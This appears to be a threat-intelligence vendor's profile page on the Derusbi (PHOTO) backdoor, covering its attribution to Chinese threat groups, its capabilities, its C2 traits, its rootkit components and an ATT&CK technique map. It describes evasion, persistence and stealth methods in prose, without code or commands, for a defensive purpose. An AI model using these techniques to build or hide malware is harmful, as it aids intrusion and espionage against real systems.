Derusbi
Derusbi (also known as Photo/PHOTO) is a stealthy, versatile backdoor/RAT family associated with multiple Chinese threat activity clusters since at least 2008 and frequently linked to advanced persistent threat operations against high-value targets. The content associates Derusbi with groups including APT40, Deep Panda, Earth Lusca (as an inspiration source for SprySOCKS), and Wicked Panda/APT41, and notes it has been employed in espionage, data theft, and broader system compromise.
Observed capabilities in the provided content include screen capture, video capture, audio capture, keylogging-related ecosystem links, interactive shell functionality, file and directory operations, file deletion, Registry key/value enumeration, username collection, and timestomping. A Linux variant checks whether the effective user ID is root and will not execute without root privileges; it also gathers the victim username. One Linux variant was observed loading a Linux kernel module and then deleting it from disk while overwriting the file with null bytes.
The malware uses multiple stealth and persistence mechanisms. Reported behaviors include process injection, encrypted or obfuscated communications, service creation, driver loading, DLL side-loading, lateral movement via removable drives, and Registry persistence that can proxy execution through regsvr32.exe. Deep Panda reportedly used regsvr32.exe to execute a server variant of Derusbi. The content also states Derusbi supports timestomping.
Network and C2 characteristics mentioned in the content include use of unencrypted HTTP over port 443, binding to a raw socket on a random source port between 31800 and 31900 for C2, and obfuscation of C2 traffic with variable 4-byte XOR keys. Another analyzed Derusbi-linked architecture included kernel/userland separation, named-pipe IPC, XOR-obfuscated configuration, optional LZO compression, and CRC32 checksums, with support for up to eight C2 entries.
Additional technical details from the provided reporting describe a Windows x64 rootkit/driver component linked to the Derusbi ecosystem that was signed with stolen legitimate certificates, disabled the kernel debugger, hid network connections and files, injected an encrypted userland DLL directly into SYSTEM svchost.exe from kernel memory, and used named pipes for kernel-to-userland communication. The userland component was modular, supporting command execution, proxying, remote desktop, file operations, VPN-related functionality, and uninstall/disconnect features. The same reporting also described a Linux userland library consistent with Derusbi server behavior and an embedded Linux kernel module that hid RAT traffic and accepted packets to a specific port range.
Known aliases in the content are Derusbi and Photo/PHOTO.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
4 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
PHOTO, BADFLICK, and CHINA CHOPPER are among the most frequently observed backdoors used by APT40.
PHOTO, BADFLICK, and CHINA CHOPPER are among the most frequently observed backdoors used by APT40.
PHOTO, BADFLICK, and CHINA CHOPPER are among the most frequently observed backdoors used by APT40.
PHOTO, BADFLICK, and CHINA CHOPPER are among the most frequently observed backdoors used by APT40.
Groups observed using it
4 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
The group uses a variety of TTPs including but not limited to LoTL tactics, phishing, ransomware, cryptocurrency mining, supply chain attacks, China Chopper, Gh0st RaT, PlugX, HighNoon, Derusbi, BioPass RAT, RedXOR, and ShadowPad.
The group uses a variety of TTPs including but not limited to LoTL tactics, phishing, ransomware, cryptocurrency mining, supply chain attacks, China Chopper, Gh0st RaT, PlugX, HighNoon, Derusbi, BioPass RAT, RedXOR, and ShadowPad.
Tools Nanhaishu, Orz, SeDll, Cobalt Strike, GreenCrash, AIRBREAK, BlackCoffee, China Chopper, FUSIONBLAZE, HOMEFRY, MURKYTOP, Metasploit / Meterpreter, ScanBox, Derusbi Trojan, Derusbi, Metasploit
Derusbi variants have been seen that use Registry persistence to proxy execution through regsvr32.exe.
Techniques & procedures
28 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
2 techniques
Initial Access
Execution
1 technique
Execution
Persistence
4 techniques
Persistence
"APT40 relies heavily on web shells for an initial foothold... provide continued access... re-infect... and facilitate lateral movement."
Utilize behavioral analytics and endpoint detection tools to identify indicators such as pesistence, service creation, lateral movement via removable drive, driver loading and dll side loading.
Privilege Escalation
5 techniques
Privilege Escalation
Known for its adaptability, it employs techniques like process injection and encrypted communications to evade detection.
Utilize behavioral analytics and endpoint detection tools to identify indicators such as pesistence, service creation, lateral movement via removable drive, driver loading and dll side loading.
Stealth
7 techniques
Stealth
Known for its adaptability, it employs techniques like process injection and encrypted communications to evade detection.
Examples throughout the content include deleting tools, logs, malware-related files, staged archives, screenshots, temporary files, and exfiltrated data 'to cover their tracks,' 'reduce their footprint,' 'remove traces of activity,' or as part of 'post-intrusion cleanup.'
The content repeatedly describes adversaries and malware deleting files, directories, droppers, scripts, logs, archives, staged data, and other artifacts from compromised systems, e.g., 'APT29 has used SDelete to remove artifacts from victim networks' and 'Lazarus Group malware has deleted files in various ways, including "suicide scripts" to delete malware binaries from the victim.' | The content includes secure deletion and overwrite behavior, e.g., 'APT29 has used SDelete to remove artifacts,' 'GreyEnergy can securely delete a file,' 'LiteDuke can securely delete files by first writing random data to the file,' and 'PowerDuke has a command to write random data across a file and delete it.'
APT28 has performed timestomping on victim files. APT29 has used timestomping to alter the Standard Information timestamps on their web shells to match other files in the same directory. APT32 has used scheduled task raw XML with a backdated timestamp... APT38 has modified data timestamps to mimic files that are in the same folder on a compromised host.
AppleSeed can call regsvr32.exe for execution. APT19 used Regsvr32 to bypass application control techniques. APT32 created a Scheduled Task/Job that used regsvr32.exe to execute a COM scriptlet that dynamically downloaded a backdoor and injected it into memory. ... Raspberry Robin uses regsvr32.exe execution without any command line parameters for command and control requests to IP addresses associated with Tor nodes.
Discovery
6 techniques
Discovery
The content repeatedly describes malware and threat actors querying, enumerating, searching, reading, or checking Windows Registry keys and values, e.g., "ADVSTORESHELL can enumerate registry keys," "APT41 queried registry values to determine items such as configured RDP ports and network configurations," and "Reg may be used to gather details from the Windows Registry of a local or remote system at the command-line interface."
The content repeatedly describes malware and threat actors collecting usernames, identifying logged-in users, running whoami/query user/quser, checking whether the current user is an administrator, enumerating user sessions, and gathering account details from compromised hosts.
The content repeatedly describes malware and threat actors obtaining lists of running processes, using utilities such as tasklist, ps, WMI, Get-Process, CreateToolhelp32Snapshot, EnumProcesses, and similar APIs/commands to enumerate active processes on victim systems.
The content notes checks for whether the current user is an administrator or privileged, including 'AsyncRAT can check if the current user of a compromised system is an administrator,' 'Gelsemium has the ability to distinguish between a standard user and an administrator,' and 'Wizard Spider has used whoami to identify the local user and their privileges.'
The content repeatedly describes malware and threat actors collecting host details such as OS version, hostname, architecture, CPU, memory, BIOS, domain, language, and other configuration data; e.g., "APT41 uses multiple built-in commands such as systeminfo and net config Workstation to enumerate victim system basic configuration information."
The content repeatedly describes malware and threat actors listing files and directories, enumerating drives, searching for files by extension/name/path, retrieving file metadata, and browsing file systems (for example: "APT28 has used Forfiles to locate PDF, Excel, and Word documents during collection" and "cmd can be used to find files and directories with native functionality such as dir commands").
Lateral Movement
1 technique
Lateral Movement
Collection
3 techniques
Collection
"Agent Tesla can capture screenshots of the victim’s desktop"; "AppleSeed can take screenshots on a compromised host"; "APT28 has used tools to take screenshots from victims"; "Cobalt Strike's Beacon payload is capable of capturing screenshots"; "PowerSploit's Get-TimedScreenshot Exfiltration module can take screenshots at regular intervals"; "Hydraq includes a component based on the code of VNC that can stream a live feed of the desktop"
Command and Control
5 techniques
Command and Control
"Common TCP ports 80 and 443 are used to blend in with routine network traffic."
Known for its adaptability, it employs techniques like process injection and encrypted communications to evade detection.
"3PARA RAT command and control commands are encrypted within the HTTP C2 channel using the DES algorithm in CBC mode..."; "APT33 has used AES for encryption of command and control traffic."; "Carbanak encrypts the message body of HTTP traffic with RC2 (in CBC mode)."; "Duqu ... data stream can be encrypted with AES-CBC."; "PoisonIvy uses the Camellia cipher to encrypt communications."
Recent activity
40 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
The group uses a variety of TTPs including but not limited to LoTL tactics, phishing, ransomware, cryptocurrency mining, supply chain attacks, China Chopper, Gh0st RaT, PlugX, HighNoon, Derusbi, BioPass RAT, RedXOR, and ShadowPad.
Derusbi is listed as malware relevant to the detection's analytic stories, implying possible use of DLL side-loading or related tradecraft. No further description is provided in the content.
Associated Analytic Story ... Derusbi
Derusbi is referenced as a backdoor/RAT in suspicious execution and driver-loading detections.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.